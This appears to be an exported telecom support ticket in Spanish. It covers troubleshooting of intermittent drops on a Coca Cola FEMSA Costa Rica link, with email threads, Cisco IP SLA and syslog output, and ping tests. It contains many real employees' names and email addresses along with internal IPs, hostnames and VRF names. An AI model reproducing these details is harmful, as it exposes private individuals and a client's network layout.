ENVIADO: JUEVES, 30 DE JUNIO DE 2022 16:38
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEG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32784
MUY BUENAS TARDES ESTIMADOS.
CON LAS PRUEBAS CORRESPONDIENTES SE TRASLADARA A UN CONSULTOR PARA QUE PUEDA REALIZAR LOS CAMBIOS DEBIDOS, SE LES ESTARÁ INFORMANDO SI SE DEBE REQUERIR ALGO DE SU PARTE PARA PODER SOLVENTAR EL INCONVENIENTE.
SI DETECTAMOS LAS CAÍDAS HACE MÁS DE DOS HORAS DEL MONITOREO QUE APUNTA A LAS SIGUIENTES DIRECCIONES:
CC_FEMSA_CR_CALLEBLANCOS#SHOW IP SLA  STATISTICS
IPSLAS LATEST OPERATION STATISTICS
IPSLA OPERATION ID: 10
        LATEST RTT: 144 MILLISECONDS
LATEST OPERATION START TIME: 22:04:03 UTC THU JUN 30 2022
LATEST OPERATION RETURN CODE: OK
NUMBER OF SUCCESSES: 384
NUMBER OF FAILURES: 4
OPERATION TIME TO LIVE: FOREVER
IPSLA OPERATION ID: 11
        LATEST RTT: 104 MILLISECONDS
LATEST OPERATION START TIME: 22:04:02 UTC THU JUN 30 2022
LATEST OPERATION RETURN CODE: OK
NUMBER OF SUCCESSES: 205
NUMBER OF FAILURES: 4
OPERATION TIME TO LIVE: FOREVER
SE LOGRO OBSERVAR LOS LOGS EN LA CENTRAL
CC_FEMSA_CR_CALLEBLANCOS#SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 29496 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 4 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 29496 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 29499 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
G: PROCESS 100, NBR 10.148.0.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*DEC 19 14:19:13.618: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*DEC 19 14:19:14.618: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 14:29:13.866: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:03:24.934: %OSPF-5-ADJCHG: PROCESS 100, NBR 10.201.1.89 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*DEC 19 15:04:15.186: %TRACK-6-STATE: 4 IP SLA 4 REACHABILITY UP -&gt; DOWN
*DEC 19 15:05:55.222: %TRACK-6-STATE: 3 IP SLA 3 REACHABILITY UP -&gt; DOWN
*DEC 19 15:06:02.362: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON CONSOLE
*DEC 19 15:08:47.194: %BGP-5-NBR_RESET: NEIGHBOR 10.201.1.89 ACTIVE RESET (PEER CLOSED THE SESSION)
*DEC 19 15:08:47.194: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.1.89 IPV4 UNICAST VPN VRF FEMSA_LITE TOPOLOGY BASE REMOVED FROM SESSION  PEER CLOSED THE SESSION
*DEC 19 15:08:48.758: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.1.89 VPN VRF FEMSA_LITE UP
*DEC 19 15:11:33.458: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 15:11:36.542: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 15:11:37.542: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 15:11:59.250: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*DEC 19 15:12:28.286: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*DEC 19 15:12:28.366: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE UP
*DEC 19 15:14:15.950: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:57:12.978: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:57:34.442: %BGP-5-NBR_RESET: NEIGHBOR 172.19.10.1 RESET (INTERFACE FLAP)
*DEC 19 15:57:34.450: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE DOWN INTERFACE FLAP
*DEC 19 15:57:34.450: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 172.19.10.1 IPV4 UNICAST VPN VRF FEMSA_LITE TOPOLOGY BASE REMOVED FROM SESSION  INTERFACE FLAP
*DEC 19 15:57:36.390: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*DEC 19 15:57:37.390: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 15:57:38.382: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 16:12:00.194: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 16:12:00.378: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 16:12:03.542: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 16:12:04.542: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 16:12:08.462: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE UP
*JAN 31 17:57:20.901: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 16:16:18.760: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 20:46:35.027: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB  3 22:55:34.738: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 23:10:31.050: %CLEAR-5-COUNTERS: CLEAR COUNTER ON INTERFACE GIGABITETHERNET0/1 BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 23:56:57.934: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB  8 14:52:27.862: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  8 14:54:42.014: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.10.65)
*FEB 15 22:57:20.423: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:06:35.955: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:17:38.434: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:33:41.834: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 21:41:28.777: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*APR 28 23:33:23.094: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  2 19:44:24.975: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  4 15:13:43.044: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 15:25:02.684: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 16:11:01.284: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:11:49.919: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:38:47.559: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:19:33.302: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:20:23.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 17:20:26.278: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:20:33.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 29 17:20:35.298: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:23:09.282: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:23:21.946: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:24:41.858: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:31:08.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 17:31:29.282: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 17:31:33.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 29 17:40:08.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 17:40:43.450: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 29 18:45:43.910: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 18:46:23.850: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 22:43:49.097: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 22:44:24.097: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 29 23:09:45.133: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 23:10:20.133: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 29 23:34:19.348: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN 29 23:55:56.956: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 29 23:56:01.956: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 30 01:44:36.088: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 30 01:44:36.088: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUN 30 01:45:11.088: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 30 01:45:11.088: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUN 30 12:18:14.285: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 30 12:18:14.285: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUN 30 12:18:39.285: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 30 12:18:49.285: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUN 30 16:14:08.996: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUN 30 16:14:13.996: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUN 30 18:48:00.588: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 30 18:48:00.588: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUN 30 18:48:35.624: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUN 30 18:48:35.624: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUN 30 19:30:42.360: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUN 30 19:30:47.360: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUN 30 19:31:12.360: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUN 30 19:31:17.404: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
CC_FEMSA_CR_CALLEBLANCOS#SHOW CLOC
*21:56:51.639 UTC THU JUN 30 2022</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE CON PRUEBAS DESCRITAS SE LOGRO OBSERVAR QUE EL EQUIPO RADWIN 2 K DE LA CENTRAL TIENE UN PAR DE ERRORES. SE ESTARA SATURANDO LA RUTA PARA VER SI SE INCREMENTAN##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 10:15
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@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32784
MUY BUENOS DÍAS ESTIMADOS.
CON REFERENCIA A EL MONITOREO LES COMENTO QUE VIENDO LA RUTA CON MÁS DETALLE Y SE OBSERVA UN TRACK 6 QUE TIENE UNAS CAÍDAS ESPONTANEAS, QUE VALIDANDO LA RUTA COMPLETA SOLO SE VE UN EQUIPO RADWIN 2K UBICADO EN NUESTRA CENTRAL QUE TIENE ERRORES. SE ESTÁ SATURANDO LA RUTA PARA OBSERVAR SI LOS ERRORES SE INCREMENTAN Y PROCEDER A HACER UNOS CAMBIOS.
SE ESTARÁ SIGUIENDO CON LA SATURACIÓN Y EL DÍA DE HOY SE ESTARÁ MANDANDO QUE SE PROCEDERÁ SI INCREMENTAN LOS ERRORES EN EL EQUIPO MENCIONADO ANTERIORMENTE. TODAS LAS PRUEBAS SE DETALLAN EN EL PDF ADJUNTO.
QUEDAMOS ATENTOS A CUALQUIER DUDA ADICIONAL
SALUDOS</t>
  </si>
  <si>
    <t>###SE PROCEDE A RESPONDER AL CLIENTE##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 16:51
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&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RROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
BUENA TARDE ESTIMADOS.
SOLO NECESITAMOS UNA DIRECCIÓN IP DE SU CENTRAL PARA HACER LAS RESPECTIVAS PRUEBAS Y VER CÓMO RESPONDE AL SATURAR EL ENLACE CON EL PROGRAMA EN LA COMPUTADORA DE NUESTRO TÉCNICO DE CAMPO, SIEMPRE EN LAS MISMAS INSTALACIONES DONDE SE REALIZÓ LA VISITA. NO ES NECESARIO NADA ADICIONAL Y DE MEJOR FORMA SI SE PUEDE REALIZAR EN UN HORARIO DONDE EL ENLACE SE ALARMA PARA TENER UN DATO REAL AL REALIZAR LA CERTIFICACIÓN.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS</t>
  </si>
  <si>
    <t>####SE LOGRA EXPLICAR A ESTEBAN DE LAS PRUEBAS QUE SE DEBEN REALIZAR. SE SEGUIRA A LA ESPERA DE QUE EL CLIENTE MANDE EL CORREO CON LA HORA Y DIA DE VISITA ###
1001631228
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:04:26
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 22/06/2022 11:44:21</t>
  </si>
  <si>
    <t>####SE ENVIA CORREO AL CLIENTE PARA QUE NOS PUEDA PROPORCIONAR UNA IP DE UNA CENTRAL PARA PODER SATURAR EL ENLACE CON EL TFGEN Y REALIZAR LA ULTIMA PRUEBA. ENLACE A NIVEL DE EQUIPOS, MEDIO Y CONFIG TODO SE OBSERVA CORRECTAMENTE###
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 13:02
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&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ONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; MASIS, MAURICO &lt;MAURICO.MASIS@DXC.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; VARGAS, MELVIN &lt;MELVIN.VARGAS@DXC.COM&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; LOPEZ ZELEDON, LUIS ALEJANDRO &lt;L.LOPEZZELEDON@DXC.COM&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; PEREZ ARIAS, ESTEBAN ANDRES &lt;E.PEREZARIAS@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
BUENA TARDE ESTIMADOS.
CON REFERENCIA AL ENLACE  CONTR0001286888OC SE VERIFICA QUE EL ESTADO DE LOS EQUIPOS Y CABLEADO ESTA CORRECTAMENTE, SE INTENTÓ SATURAR EL ENLACE, PERO SE NECESITA UNA DIRECCIÓN IP DE LA CENTRAL DEL CLIENTE PARA PODER APUNTAR HACIA ELLA Y SATURAR EL ENLACE PARA COMPROBAR CÓMO SE COMPORTA. SE INTENTO LLAMAR A KEVIN DEL CID PERO NO SE TUVO RESPUESTA. QUISIERA NOS PUDIERAN APOYAR PARA PROPORCIONAR UNA DIRECCIÓN IP DE UNA CENTRAL Y COORDINAR NUEVAMENTE UNA VISITA PARA PODER REALIZAR LA ÚLTIMA PRUEBA PARA CERTIFICAR EL ENLACE.
ADICIONAL SERIA LO MEJOR PODER REALIZAR LA VISITA EN EL HORARIO QUE INDICAN LAS ALARMAS DEL ENLACE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS
SE ADJUNTAN PRUEBAS REALIZADAS
&lt;LPOCCRGUN1W1N01O01EIM1&gt;PING -C 1500 -S 1500 -M 50 -B -VPN DATOS_FEMSA_CR 10.201.53.206
  PING 10.201.53.206: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.201.53.206 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 7/9/147 MS
SE REALIZA PING HACIA EL RADIO RADWIN DEL NODO Y NO SE TIENE PERDIDAS DE PAQUETES ACTUALMENTE.
&lt;LPOCCRGUN1W1N01O01EIM1&gt;PING  -C 1400 -S 1400 -M 50 -B -VPN-INSTANCE  CR_ETX 10.199.78.43
  PING 10.199.78.43: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!